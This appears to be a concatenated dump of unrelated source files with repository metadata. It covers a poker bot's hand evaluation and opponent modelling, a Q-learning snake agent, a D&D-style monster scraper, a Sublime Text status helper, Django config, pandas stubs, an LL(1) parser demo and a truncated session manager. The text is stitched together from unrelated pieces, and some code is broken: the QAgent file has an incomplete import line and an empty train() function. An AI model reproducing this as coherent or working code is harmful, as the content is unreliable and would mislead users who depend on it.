#scale chosen by inspection
randomAction +=int(abs(logistic(currOpp.AF*maxRaise,1)))
randomAction /= samples
expectedActions[currOpp.name] = Player.closestInt(enumRaises,randomAction)
for oppAction in expectedActions:
if expectedActions[oppAction]==callSize-1:
continue
else:
impliedPot+=expectedActions[oppAction]
self.impliedPotOdds = callSize/impliedPot
else:
pass
except:
#no CALL or RAISE in histories
pass
@staticmethod
def closestInt(L,num):
minDiff = currDiff = None
minElem = None
for i in range(len(L)):
currDiff = abs(L[i]-num)
if minDiff == None: minDiff=currDiff
if currDiff<=minDiff: #break ties downwards
minDiff = currDiff
minElem = L[i]
return minElem
def getWinRate(self):
wins = 0
for event in self.histories[self.name]:
if ("WIN" in event or 'TIE' in event) and self.name in event:
wins+=1
self.winRate = wins/self.numHands
def getExpectedValue(self):
if len(self.hole+self.board)<=6:
outProb = Player.monteCarloTest(self.hole+self.board, True)
self.EV = outProb-self.potOdds
self.impliedEV = outProb-self.impliedPotOdds
def boardReset(self):
self.allHistories.append((['back']*5,time.time()))
def historyUpdate(self, packetValues, handOver=False):
if not handOver:
for value in packetValues:
if value.count(':')==2: #raise,bets,calls have 2 colons
for player in self.playerNames:
if player in value:
self.histories[player].append(value)
elif handOver:
river = []
for value in packetValues:
#only needs to compute winrate for self
if ('WIN' in value or 'TIE' in value) and self.name in value:
self.histories[self.name].append(value)
elif len(value)==2:
if value[0] in Player.values and value[1] in Player.suits:
river.append(value)
self.allHistories.append((river,time.time()))
#repeats in board, potsize, and playerinfo are fine
self.allHistories.append((self.board,time.time()))
self.allHistories.append((['pot',self.potSize],time.time()))
#print('historyUpdate check', self.name, self.hole)
self.allHistories.append(([self.name,self.hole,self.stack],time.time()))
if self.name=='player1':
for value in packetValues:
if ':' in value and 'player' in value:
self.allHistories.append((value,time.time())) #dont want repeats in events
print(self.allHistories,'\n\n')
'''
AF benchmark values:
http://poker.gamblefaces.com/understanding-hud/post-flop-aggression-factor/
AF Value Category
0<AF<1 Passive
1<AF<1.5 Neutral
AF>1.5 Aggressive
'''
def getAggressionFactor(self):
#set both to 1 b/c divide by zero
downs = 1 #calls or folds
ups = 1 #bets or raises
for event in self.histories[self.name]:
if 'CALL' in event: #or 'FOLD' in event:
downs+=1
elif 'BET' in event or 'RAISE' in event:
ups+=1
self.AF = ups/downs
if self.AF<1:
self.AFtype = 'passive'
elif self.AF>=1 and self.AF<1.5:
self.AFtype = 'neutral'
elif self.AF>=1.5:
self.AFtype = 'aggressive'
#class/static methods
@staticmethod
def readFile(path, withPickle = False):
if withPickle:
with open(path, "rb") as f:
return pickle.load(f)
else:
with open(path, "rt") as f:
return f.read()
@staticmethod
def writeFile(path, contents, withPickle = False):
if withPickle:
with open(path, "wb") as f:
pickle.dump(contents,f)
else:
with open(path, "wt") as f:
f.write(contents)
#get blind size from config.txt
@classmethod
def getBlind(self):
path = os.getcwd()
config = Player.readFile(path+os.sep+'config.txt')
return int(config.split('\n')[0][-1])
@classmethod
def bestHand(Player,cards):
#call this function post-flop and on turn to compute best hand
#get unordered 5-tuples from allCards
hands = list(it.combinations(cards,5)) #list of tuples
best = 0 #power of best hand
for hand in hands:
result = Player.checkHandType(hand)
if result[1]>=best:
best=result[1]
return best
@classmethod
def monteCarloTest(Player,allCards,returnProb = False):
#runs Monte Carlo sim to get average best hand if cards are added
#to community
simNum = 100
simCount = 0
cumePower = 0
adjustedFullDeck = copy.copy(Player.fullDeck)
assert(len(allCards)<=6)
if returnProb:
beatCount = 0
currBest = Player.bestHand(allCards)
#removing hole cards
for card in adjustedFullDeck:
if card in allCards:
adjustedFullDeck.remove(card)
initAdjustedFullDeck = copy.copy(adjustedFullDeck)
while simCount<=simNum:
adjustedFullDeck = copy.copy(initAdjustedFullDeck)
currCards = copy.copy(allCards)
if len(allCards)<=6: #river
nextCard = random.choice(adjustedFullDeck)
currCards+=[nextCard]
adjustedFullDeck.remove(nextCard)
if len(allCards)<=5: #turn
nextCard2 = random.choice(adjustedFullDeck)
currCards+=[nextCard2]
adjustedFullDeck.remove(nextCard2)
if len(allCards)==2: #flop
nextCard3 = random.choice(adjustedFullDeck)
currCards+=[nextCard3]
if Player.bestHand(currCards)>currBest:
beatCount+=1
cumePower+=Player.bestHand(currCards)
simCount+=1
if returnProb:
return beatCount/simNum #probabilty of getting a better hand than currBest
else:
return cumePower/simNum
@classmethod
def powerRatio(Player,allCards):
currBest = Player.bestHand(allCards)
predictedBest = Player.monteCarloTest(allCards)
#my own definition of pot odds
return predictedBest/currBest
@classmethod
def checkHandType(Player,hand):
#returns hand type, as well as power index
def highFreq(handStr):
uniques = list(set(handStr))
maxFreq = 0
for i in uniques:
if handStr.count(i)>maxFreq:
maxFreq=handStr.count(i)
return maxFreq
def twoPair(hand,handStrVals):
valList = list(set(handStrVals))
counts = []
for i in counts:
counts+=handStrVals.count(i)
if sorted(counts)==[1,2,2]:
return True
assert(len(hand)==5) #texas hold'em hands have 5 cards
handStr = ''.join(hand)
handStrVals = ''.join(sorted([x[:-1] for x in hand])) #just values
handStrSuits = ''.join([x[-1] for x in hand]) #just suits
#royal flush
if handStrVals in Player.valuesStr and len(set(handStrSuits))==1:
handType = 'straightflush' #royal flush is just straight flush with maxPower
elif highFreq(handStrVals)==4:
handType = '4ofakind'
elif len(set(handStrVals))==2:
handType = 'fullhouse'
elif len(set(handStrSuits))==1:
handType = 'flush' #doesn't conflict with straight flush b/c elif
elif handStrVals in Player.valuesStr:
handType = 'straight'
elif highFreq(handStrVals)==3:
handType = '3ofakind'
elif twoPair(hand,handStrVals):
handType = '2pair'
elif highFreq(handStrVals)==2:
handType = '1pair'
else:
handType = 'highcard'
#particular power within hand family
return (handType, Player.handOrder.index(handType)+1)
#Player will have a list of Opponent instances
class Opponent(Player):
def __init__(self, name, playerDict):
super().__init__(name)
self.histories = playerDict['histories'][self.name]
#update attributes on each packet
def attrsUpdate(self,playerDict):
self.histories = {self.name: playerDict['histories'][self.name]}
self.numHands = playerDict['numHands']
| [
"aptebros@gmail.com"
] | aptebros@gmail.com |
8221254cccecc142e5a2d0560a81568baf3ee901 | 0c3dc0735791266e2127859a38ae20ed8040c08e | /control_horas_lectivas/dtos/usuario_dto.py | ab5937d06c2060e507bf92e4ae8b019ce9511055 | [] | no_license | williamccondori/unsa_sistema_academico | 4ac0d5400d953daea44f4be78fc3210b1e07e023 | 9046dd70dc729b90f4c83a7e799007f459f51aca | refs/heads/master | 2021-03-30T23:48:08.858797 | 2018-04-05T22:15:29 | 2018-04-05T22:15:29 | 125,013,005 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 158 | py | class UsuarioDto(object):
def __init__(self, username='', id_departamento=0):
self.Username=username
self.IdDepartamento = id_departamento | [
"williamccondori@outlook.com"
] | williamccondori@outlook.com |
e5efc3c9464fe665edf8cf81776c48e663dc9fed | a4fc49a7d188f0d56e93207fba79db00406e2783 | /instance/config.py | a23b87080b763b7f4af8e2baf31c53c2cd37f17d | [] | no_license | wightcotton/Budgeting | 411aca92af7f6106762553f8868ce22d4911cd9b | 05acc40a211ca365bfb786b4de5c40403e2031e6 | refs/heads/master | 2021-01-06T02:56:08.489026 | 2019-07-10T21:09:09 | 2019-07-10T21:09:09 | 241,205,671 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 85 | py | # configs
DATASOURCE = "C:/Users/Bob/Documents/money/budget/current budget info.xlsx" | [
"bob@wightcottonn.com"
] | bob@wightcottonn.com |
713716f99e0b6a39fd9ebd2069050e1a8522be74 | b2e501080c178839d8fa4146b0392da8470bf677 | /QAgent.py | daf8d540c9f976bff46e0a1c23ed2d35f43a81f1 | [] | no_license | nsms556/AILearningsSnake | 5c66b810476cf5309add9f8c34e9426b423c7735 | e054f81d7fd191821acc1025643ce3704467ba34 | refs/heads/master | 2023-03-26T05:37:18.197810 | 2021-03-24T12:35:16 | 2021-03-24T12:35:16 | 325,515,004 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,787 | py | import random
from collections import deque
from typing import final
import numpy as np
import torch
from snake import SnakeGame
from utils.Snake_Statics import HIDDEN_SIZE, INPUT_SIZE, OUTPUT_SIZE,
import utils.AIUtils as AIU
from models.torchModel import *
MAX_MEMORY = 100000
BATCH_SIZE = 1000
LR = 0.001
class QAgent :
def __init__(self) :
self.n = 0
self.epsilon = 0
self.gamma = 0.9
self.memory = deque(maxlen=MAX_MEMORY)
self.model = QNet(INPUT_SIZE, HIDDEN_SIZE, OUTPUT_SIZE)
self.trainer = QTrainer(self.model, lr=LR, gamma=self.gamma)
def get_state(self, game) :
return AIU.get_inputs(INPUT_SIZE, game)
def remember(self, state, action, reward, next_state, done) :
self.memory.append((state, action, reward, next_state, done))
def train_long_memory(self) :
if len(self.memory) > BATCH_SIZE :
mini_Sample = random.sample(self.memory, BATCH_SIZE)
else :
mini_Sample = self.memory
states, actions, rewards, next_states, dones = zip(*mini_Sample)
self.trainer.train_step(states, actions, rewards, next_states, dones)
def train_short_memory(self, state, action, reward, next_state, done) :
self.trainer.train_step(state, action, reward, next_state, done)
def get_action(self, state) :
self.epsilon = 80 - self.n
final_action = [0, 0, 0, 0]
if random.randint(0,200) < self.epsilon :
move = random.randint(0,3)
final_action[move] = 1
else :
state0 = torch.tensor(state, dtype=torch.float)
pred = self.model(state0)
move = torch.argmax(pred).item()
final_action[move] = 1
return final_action
def train() :
| [
"nsms556@kakao.com"
] | nsms556@kakao.com |
771ec8576328d1d3ae8a24f14afee76c8db1f54a | 3ba1c1bd3215634f0422bbbba1ac6871c3592d1c | /process/aon1e.py | fef5d0530df67763c6e4ebca3d95a36e451700cf | [] | no_license | Djphoenix719/nlp2020-project | d928a81fcf45be5671a7f6b5eb011ec2e91c64fe | c7b54dec8b941c0a9e92b73285485b07e07e283f | refs/heads/main | 2023-01-23T03:11:08.869025 | 2020-12-13T23:38:33 | 2020-12-13T23:38:33 | 310,170,196 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,361 | py | import os
from bs4 import BeautifulSoup
from tqdm import tqdm
from process.util import ladle, collect_until_end, full_clean, write_output
def process_aon1e():
system = 'pf1e'
input_dir = f"data/raw/{system}"
os.makedirs(f'data/processed/{system}', exist_ok=True)
for file_name in tqdm(os.listdir(input_dir), desc=f'Processing {system}', unit='file', position=0, leave=True):
file_path = os.path.join(input_dir, file_name)
soup, raw_text = ladle(file_path)
soup = BeautifulSoup(str(soup.find('div', {'class': 'main'})), features='html.parser')
title = soup.find('h1', {'class': 'title'})
monster_name = title.text
lore_start = title.find_next('h3', {'class': 'framing'}, text='Description')
if lore_start is None:
continue
lines = collect_until_end(lore_start.next_sibling, end_on_tags=['h1'], skip_collection=['b'])
short_desc = title.find_next('i').text
if "pg." not in short_desc.lower():
lines = [short_desc, *lines]
lines = full_clean(lines)
# lines = "".join(lines)
# lines = lines.replace('\n', ' ')
# lines = lines.split('.')
# lines = [f"{line}.".strip() for line in lines if line.strip() != ""]
# lines = "\n".join(lines)
write_output(monster_name, system, lines)
| [
"andrewcuccinello@gmail.com"
] | andrewcuccinello@gmail.com |
bd13eec195727b03591f3658eaa75c0f54f16624 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03827/s915868982.py | 561cb7cb4a15cc5878feaba7bc58f0a5af14916d | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 114 | py | N = int(input())
S = input()
x = 0
ans = 0
for s in S:
x += 1 if s == "I" else -1
ans = max(ans, x)
print(ans) | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
f12934c72c25fe75ab9552dceeb66260eb6849a0 | 484377c159df3241f9a53e5e03f754563d0630cb | /blog/admin.py | f5f330e8de99c6e1fe5391779c9f34d1482f5287 | [] | no_license | SandyOliveira/BlogEmDjango | 43ed851418a7f2c1edb6da71524938aaa5fa8d32 | 6b8a87cf82f73ac2541f37b547efb3d9c37debc0 | refs/heads/master | 2022-10-17T06:10:40.935679 | 2020-06-09T00:51:43 | 2020-06-09T00:51:43 | 266,949,420 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,072 | py | from django.contrib import admin
from .models import Post, Category
@admin.register(Category)
class PostAdmin(admin.ModelAdmin):
list_display =('nome','criado','publicado')
list_filter = ('nome','criado','publicado')
date_hierarchy = 'publicado'
search_fields = ('nome',)
@admin.register(Post)
class PostAdmin(admin.ModelAdmin):
list_display = ('title', 'autor', 'publicado','status')
list_filter = ('status', 'criado', 'publicado', 'autor') #campo de filtragem
readonly_fields = ('view_image',) #aparecer a imagem para o admin('view_image')
raw_id_fields = ('autor',) #serve para campos manyTomany e foreikin , inserir mais de 1 ID
date_hierarchy = 'publicado' #navegação de pesquisa detalhado (aqui esta pela data)
search_fields = ('title', 'conteudo') #campo pra fazer pesquisa
prepopulated_field = {'slug': ('title',)} #slug se basear a um campo de forma automatica
#mudando o nome view_image
def visualizar_imagem(self,obj):
return obj.view_image
visualizar_imagem.short_description = "Imagem Cadastrada" | [
"sandyoliveira828@gmail.com"
] | sandyoliveira828@gmail.com |
fd955388fa01f31415dd266a61d5fc2462658529 | b8072195ed98dba9873cda7f12e28399e0a8c006 | /ShazamBot/Shazam-Samil/bot/__init__.py | 6031088460dd7e78f5b4e0c824be83c62be3c485 | [
"Apache-2.0"
] | permissive | Yuziful/shazambot | a39bb123278c0b537ce0c8e77cd8e5c04e7e852c | 2d645ec80aa4cce8d4b5ec8c3505975d25c8bed2 | refs/heads/main | 2023-07-27T00:10:12.731407 | 2021-09-09T16:11:06 | 2021-09-09T16:11:06 | 404,788,514 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 561 | py | import logging
from configparser import ConfigParser
from bot.bot import bot
# Logging at the start to catch everything
logging.basicConfig(
format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',
level=logging.WARNING,
handlers=[
logging.StreamHandler()
]
)
LOGS = logging.getLogger(__name__)
name = 'bot'
# Read from config file
config_file = f"{name}.ini"
config = ConfigParser()
config.read(config_file)
max_file = 30641629
# Extra details
__version__ = '0.0.1'
__author__ = 'pokurt'
# Global Variables
bot = bot(name)
| [
"noreply@github.com"
] | noreply@github.com |
059d13000f25ac9b116e3ab42c1393e2fb8619a7 | 7bb46e67befa4941bb729846abfd04007a98cb2b | /colorsublime/status.py | 3c31e2bdfbc90b00e64dee28b947644538afcacc | [
"MIT"
] | permissive | Colorsublime/Colorsublime-Plugin | 8916b83c5bc650860f7ac4ed11b3aa515509a287 | 9d9c07c0807b912a5d97776a4373aba4dabe7b7f | refs/heads/master | 2022-12-21T21:24:08.846490 | 2022-12-20T03:41:39 | 2022-12-20T03:41:39 | 17,201,705 | 515 | 82 | null | 2017-08-25T10:10:31 | 2014-02-26T06:45:18 | Python | UTF-8 | Python | false | false | 2,477 | py | # -*- coding: utf-8 -*-
"""
Module to set the view status of Sublime Text plugins.
By @blopker
"""
import random
import time
import sublime
from .lib.concurrent import futures
from . import logger
from . import settings
log = logger.get(__name__)
statusPool = futures.ThreadPoolExecutor(max_workers=1)
PLUGIN_NAME = settings.plugin_name
# Default status display time in seconds
TIMEOUT = 10
current_message = None
def message(msg, seconds=TIMEOUT):
log.info(msg)
global current_message
if current_message is not None:
current_message.stop()
current_message = Message(msg, seconds)
return current_message
def error(msg, seconds=TIMEOUT):
log.error(msg)
msg = 'ERROR: ' + msg
message(msg)
return current_message
def loading(msg, seconds=TIMEOUT):
# longer time out for loading cus it could be a while.
return Loader(msg, seconds * 2)
class Message(object):
""" Class to start and cancel the status message.
Call stop() on this object to remove the message."""
def __init__(self, message, timeout):
self.message = message
self.running = True
self.timeout = timeout
self.start_time = time.time()
self.msg_id = self._get_id(message)
statusPool.submit(self._show_message)
def _get_current_view(self):
window = sublime.active_window()
view = window.active_view()
return view
def _append_plugin_name(self, msg):
return '%s: %s' % (PLUGIN_NAME, msg)
def _get_id(self, msg):
return msg + str(time.time())
def _update_timer(self):
elapsed = time.time() - self.start_time
if elapsed > self.timeout:
self.stop()
def _show_message(self):
view = self._get_current_view()
while self.running:
msg = self._get_message()
stat = self._append_plugin_name(msg)
view.set_status(self.msg_id, stat)
time.sleep(.1)
self._update_timer()
view.erase_status(self.msg_id)
def _get_message(self):
return self.message
def stop(self):
self.running = False
class Loader(Message):
chars = u'⣾⣽⣻⢿⡿⣟⣯⣷'
def _get_message(self):
mod = len(self.chars)
rands = [self.chars[x % mod] for x in random.sample(range(100), 1)]
msg = self.message + ' [' + ''.join(rands) + '] '
return msg
def stop(self):
self.running = False
| [
"lopkerk@gmail.com"
] | lopkerk@gmail.com |
03fa8f0ea7916556b812e4b74da0e4cb6a8bd37d | 41dbe386398222d83eb392528dc738d30c31ecf1 | /src/translate.py | 14afee1e38380ac2cf778fead91a944c28f659d8 | [] | no_license | spidgorny/learn-english-by-youtube | dc00fe6f6948bd7416faf4ea84badf9e20d1706a | d7ea46035cadf95ef3a66e8b965b8503088f4267 | refs/heads/master | 2023-01-07T01:23:16.318036 | 2022-02-21T09:56:53 | 2022-02-21T09:56:53 | 188,993,746 | 1 | 0 | null | 2023-01-05T23:58:02 | 2019-05-28T09:06:30 | HTML | UTF-8 | Python | false | false | 591 | py | # -*- coding: utf-8 -*-
# Imports the Google Cloud client library
from google.cloud import translate
from dotenv import load_dotenv
load_dotenv()
# import sys
# import codecs
# sys.stdout = codecs.getwriter('utf8')(sys.stdout)
# Instantiates a client
translate_client = translate.Client()
# The text to translate
text = u'Hello, world!'
# The target language
target = 'ru'
# Translates some text into Russian
translation = translate_client.translate(
text,
target_language=target)
print(u'Text: {}'.format(text))
print(u'Translation: {}'.format(translation['translatedText']))
| [
"spidgorny@gmail.com"
] | spidgorny@gmail.com |
fc521136d37bde83bf4b77d4966c06e6653d750b | 3f6c16ea158a8fb4318b8f069156f1c8d5cff576 | /.PyCharm2019.1/system/python_stubs/-1317042838/pandas/_libs/ops.py | a84d13f1d42b972f9af8b614b27048d38673cdb9 | [] | no_license | sarthak-patidar/dotfiles | 08494170d2c0fedc0bbe719cc7c60263ce6fd095 | b62cd46f3491fd3f50c704f0255730af682d1f80 | refs/heads/master | 2020-06-28T23:42:17.236273 | 2019-10-01T13:56:27 | 2019-10-01T13:56:27 | 200,369,900 | 0 | 0 | null | 2019-08-03T12:56:33 | 2019-08-03T11:53:29 | Shell | UTF-8 | Python | false | false | 2,829 | py | # encoding: utf-8
# module pandas._libs.ops
# from /var/www/newsbytes/CPP/venv/lib/python3.6/site-packages/pandas/_libs/ops.cpython-36m-x86_64-linux-gnu.so
# by generator 1.147
# no doc
# imports
import builtins as __builtins__ # <module 'builtins' (built-in)>
import operator as operator # /usr/lib/python3.6/operator.py
import numpy as np # /var/www/newsbytes/CPP/venv/lib/python3.6/site-packages/numpy/__init__.py
# functions
def maybe_convert_bool(*args, **kwargs): # real signature unknown
pass
def scalar_binop(*args, **kwargs): # real signature unknown
"""
Apply the given binary operator `op` between each element of the array
`values` and the scalar `val`.
Parameters
----------
values : ndarray[object]
val : object
op : binary operator
Returns
-------
result : ndarray[object]
"""
pass
def scalar_compare(*args, **kwargs): # real signature unknown
"""
Compare each element of `values` array with the scalar `val`, with
the comparison operation described by `op`.
Parameters
----------
values : ndarray[object]
val : object
op : {operator.eq, operator.ne,
operator.le, operator.lt,
operator.ge, operator.gt}
Returns
-------
result : ndarray[bool]
"""
pass
def vec_binop(*args, **kwargs): # real signature unknown
"""
Apply the given binary operator `op` pointwise to the elements of
arrays `left` and `right`.
Parameters
----------
left : ndarray[object]
right : ndarray[object]
op : binary operator
Returns
-------
result : ndarray[object]
"""
pass
def vec_compare(*args, **kwargs): # real signature unknown
"""
Compare the elements of `left` with the elements of `right` pointwise,
with the comparison operation described by `op`.
Parameters
----------
left : ndarray[object]
right : ndarray[object]
op : {operator.eq, operator.ne,
operator.le, operator.lt,
operator.ge, operator.gt}
Returns
-------
result : ndarray[bool]
"""
pass
def __pyx_unpickle_Enum(*args, **kwargs): # real signature unknown
pass
# no classes
# variables with complex values
__loader__ = None # (!) real value is '<_frozen_importlib_external.ExtensionFileLoader object at 0x7f43e7e6f8d0>'
__spec__ = None # (!) real value is "ModuleSpec(name='pandas._libs.ops', loader=<_frozen_importlib_external.ExtensionFileLoader object at 0x7f43e7e6f8d0>, origin='/var/www/newsbytes/CPP/venv/lib/python3.6/site-packages/pandas/_libs/ops.cpython-36m-x86_64-linux-gnu.so')"
__test__ = {}
| [
"sarthakpatidar15@gmail.com"
] | sarthakpatidar15@gmail.com |
51764b3f701d9df92c6b024d368596af088cbcc0 | 2f8e7319ddc96c9447b8977e9b5029bb7a342996 | /compilertesttttt.py | 17b853a120db6a9ed055d665c1bfafd3016d4e98 | [] | no_license | zpicenow/squirrel_buggy | 78bc8112c79ec145e6fbf15685167e37e456da5a | b94595976fc7aba6e28c2398f9096a6e3c83bf2f | refs/heads/master | 2020-04-01T20:04:40.367733 | 2018-10-18T08:09:07 | 2018-10-18T08:09:07 | 153,587,155 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,160 | py | import copy
# 输入输入序列w 和预测分析表M ,非终结符的集合N ,终结符的集合T 开始进行预测分析
def prediction_analyze(w, M, N, T):
mat = "步骤{:<15}\t栈内容 {:<20}\t当前输入 {:<30}\t动作{:<30}\t描述 {:<20}"
print(mat.format(" ", " ", " ", " ", " ", ))
Stack = list() # 创建符号栈
Stack.append('#') # 压入结束表示符#
Stack.append(N[0]) # 压入开始符,即非终结符的集合N的第一个元素
top = len(Stack) - 1 # top用于记录栈顶的下标,即最后一个元素下标
ip = 0 # 用于记录输入序列w中的终结符的下标,从首部开始
step = 1 # 记录步骤
# 当栈非空
while Stack:
content = ''.join(Stack) # 将栈内容转为字符串
inputchar = ''.join(w[ip:])
action = ""
des = ""
a = w[ip] # a用于获取到当前输入符号
x = Stack[top] # x用于获取栈顶的元素
if x in T: # 如果栈顶元素为终结符,判断是否匹配
if x == a: # 如果匹配到终结符
if Stack[-1] == '#' and a == '#':
mat = "{:<20}\t {:<25}\t {:<30}\t {:<40}\t{:<20}"
print(mat.format(step, content, inputchar, " ", "正确结束"))
break
action = "pop(" + x + "), next(ip)"
des = "匹配" + x
Stack.pop() # 弹出栈顶元素
top -= 1
ip += 1 # 指向w的下一个字符
else:
print("出错!栈顶终结符不匹配。")
return False
else: # 如果栈顶元素为非终结符,查表展开产生式
xIndex = N.index(x) # 获取x在N中的下标,方便查表
if a in M[xIndex]: # 如果M[X,a]不为空
result = copy.deepcopy(M[xIndex][a]) # 得到产生式的右侧(格式为list)
action = "pop(" + x + "), push(" + ''.join(result) + ")"
des = "按" + x + "->" + ''.join(result) + "展开"
Stack.pop() # 弹出栈顶元素
top -= 1
if result[0] == 'n': # 如果为n,无需push
action = "pop(" + x + ") "
else:
# 将展开结果取反序压入栈中
result.reverse()
for j in range(0, len(result)):
Stack.append(result[j])
top += 1
else:
print("出错!产生式不匹配。")
return False
# 输出本次执行情况
mat = "{:<20}\t {:<25}\t {:<30}\t {:<30}\t{:<20}"
print(mat.format(step, content, inputchar, action, des))
step += 1 # 步骤数加1 继续循环
if __name__ == '__main__':
print("---------即将开始收集数据,请按提示操作---------' ")
print("请输入文法G的非终结符的集合N , 输入格式为List , 如['L' , 'E' , 'rE' , 'T' , 'rT' , 'F'] ")
N = eval(input(":"))
# # #print( N)
print("请输入文法G的终结符的集合T , 输入格式为List , 如['id' , 'num' , '+' , '-' , '* ', '/ ', 'mod' , '(' , ')' , '; ', '#'] ")
T = eval(input(":"))
# # print(T) #预测表: [{'id' : ['E', ';' , 'L'] , 'num' : ['E', ';' , 'L'], '(' : ['E', ';' , 'L'],
# '#' : ['n']} ,{'id' : ['T', 'rE'] , 'num' : ['T', 'rE'] , '(' : ['T', 'rE'] } ,{'+' : ['+' , 'T' ,
# 'rE'] , '-' : ['-' , 'T' , 'rE'] , ')' : ['n'] , ';' : ['n'] } ,{'id' : ['F' , 'rT'] ,
# 'num' : ['F' , 'rT'] , '(' : ['F' , 'rT'] } ,{'+' : ['n'] , '-' : ['n'] , '*' : ['*' , 'F',
# 'rT'] , '/' : ['/' , 'F', 'rT'] , 'mod' : ['mod' , 'F', 'rT'] , ')' : ['n'] , ';' : ['n']}
# ,{'id' : ['id'] , 'num' : ['num'] , '(' : ['(', 'E' , ')'] } ]
print("请输入文法G的预测表M , 输入格式如{'id' : ['id'] , 'num' : ['num'] , '(' : ['(', 'E' , ')'] } ] ")
# "[{'id' : ['E', ';' , 'L'] , 'num' : ['E', ';' , 'L'], '(' : ['E', ';' , 'L'], '#' : ['n']} ,
# \n " "{'id' : ['T', 'rE'] , 'num' : ['T', 'rE'] , '(' : ['T', 'rE'] } , \n " "{'+' : ['+' , 'T' ,
# 'rE'] , '-' : ['-' , 'T' , 'rE'] , ')' : ['n'] , ';' : ['n'] } , \n " "{'id' : ['F' ,
# 'rT'] , 'num' : ['F' , 'rT'] , '(' : ['F' , 'rT'] } , \n" "{'+' : ['n'] , '-' : ['n'] ,
# '*' : ['*' , 'F', 'rT'] , '/' : ['/' , 'F', 'rT'] , 'mod' : ['mod' , 'F', 'rT'] , ')' : ['n'] ,
# ';' : ['n']} , \n" "{'id' : ['id'] , 'num' : ['num'] , '(' : ['(', 'E' , ')'] } ] ")
M = eval(input(":"))
# #print(M) print("---------收集数据完成,请按提示操作---------' ") N =['L' , 'E' , 'rE' , 'T' , 'rT' , 'F'] T = ['id' ,
# 'num' , '+' , '-' , '*', '/ ', 'mod' , '(' , ')' , ';', '#'] M = [{'id' : ['E', ';' , 'L'] ,
# 'num' : ['E', ';' , 'L'], '(' : ['E', ';' , 'L'], '#' : ['n']} , {'id' : ['T', 'rE'] ,
# 'num' : ['T', 'rE'] , '(' : ['T', 'rE'] } , {'+' : ['+' , 'T' , 'rE'] , '-' : ['-' , 'T' , 'rE'] ,
# ')' : ['n'] , ';' : ['n'] } , {'id' : ['F' , 'rT'] , 'num' : ['F' , 'rT'] , '(' : ['F' ,
# 'rT'] } , {'+' : ['n'] , '-' : ['n'] , '*' : ['*' , 'F', 'rT'] , '/' : ['/' , 'F', 'rT'] ,
# 'mod' : ['mod' , 'F', 'rT'] , ')' : ['n'] , ';' : ['n']} , {'id' : ['id'] , 'num' : ['num'] ,
# '(' : ['(', 'E' , ')'] } ]
while True:
w = eval(input('请输入要分析的序列w(以#号结束):'))
# w = ['id' , '+' , 'id' , '*' , 'id' , ';' , '#']
print(
"----------------------------------------------------分析过程----------------------------------------------------")
prediction_analyze(w, M, N, T) # 开始进行预测分析
print(
"----------------------------------------------------分析结束----------------------------------------------------")
break
| [
"zp2016@mail.dlut.edu.cn"
] | zp2016@mail.dlut.edu.cn |
d6210360f1d53db09d35be26788f86a1171b4b62 | e6febe9aa6c582c07c365a75dce5c2ff1d040b66 | /event_website/urls.py | 3c6b62429d65cba92e9f8d86221c42bf172a418e | [] | no_license | TinkerHub-GCEK/TinkerHub-GCEK-Event-Portal | 9b3cf7f211180d381a32837b695954c75f947f4e | 053d23c1e29d003f141db3317863d0c4a3405011 | refs/heads/master | 2023-07-17T06:51:58.429267 | 2021-08-31T13:46:11 | 2021-08-31T13:46:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,103 | py | """event_website URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django import contrib
from django.contrib import admin
from django.urls import path, include
from django.conf import settings
from django.conf.urls.static import static
from django.urls.resolvers import URLPattern
urlpatterns = [
path('admin/', admin.site.urls),
path('',include('event.urls')),
path('',include('django.contrib.auth.urls')),
path('',include('admin_user.urls')),
]+ static(settings.MEDIA_URL,document_root=settings.MEDIA_ROOT)
| [
"aiswarya2saji@gmail.com"
] | aiswarya2saji@gmail.com |
f5b9e9de541a11697be9f070250c2416341119c2 | 37f6d8d0ec694ddf6e14e926e8b53de35d0e85ee | /lib/session.py | b50fed3d369208e9833550045ca5bc2ed384e9f3 | [
"BSD-3-Clause"
] | permissive | ddong8/ihasy | d2abece2ad69cb19977e1e62e445a8c830493048 | 52e04a56eb896709df7f9fc202238b88cac97b1e | refs/heads/master | 2021-01-24T01:10:57.114379 | 2019-07-07T06:48:50 | 2019-07-07T06:48:50 | 98,000,150 | 2 | 2 | BSD-3-Clause | 2019-07-04T14:27:31 | 2017-07-22T02:03:35 | Python | UTF-8 | Python | false | false | 3,850 | py | #!/usr/bin/env python
# coding=utf-8
#
# Copyright 2017 ihasy.com
# Do have a faith in what you're doing.
# Make your life a story worth telling.
'''
@author: Manuel Mejia
'''
import pickle
import hmac
import uuid
import hashlib
import memcache
class SessionData(dict):
def __init__(self, session_id, hmac_key):
self.session_id = session_id
self.hmac_key = hmac_key
class Session(SessionData):
def __init__(self, session_manager, request_handler):
self.session_manager = session_manager
self.request_handler = request_handler
try:
current_session = session_manager.get(request_handler)
except InvalidSessionException:
current_session = session_manager.get()
for key, data in current_session.items():
self[key] = data
self.session_id = current_session.session_id
self.hmac_key = current_session.hmac_key
def save(self):
self.session_manager.set(self.request_handler, self)
class SessionManager(object):
def __init__(self, secret, memcached_address, session_timeout):
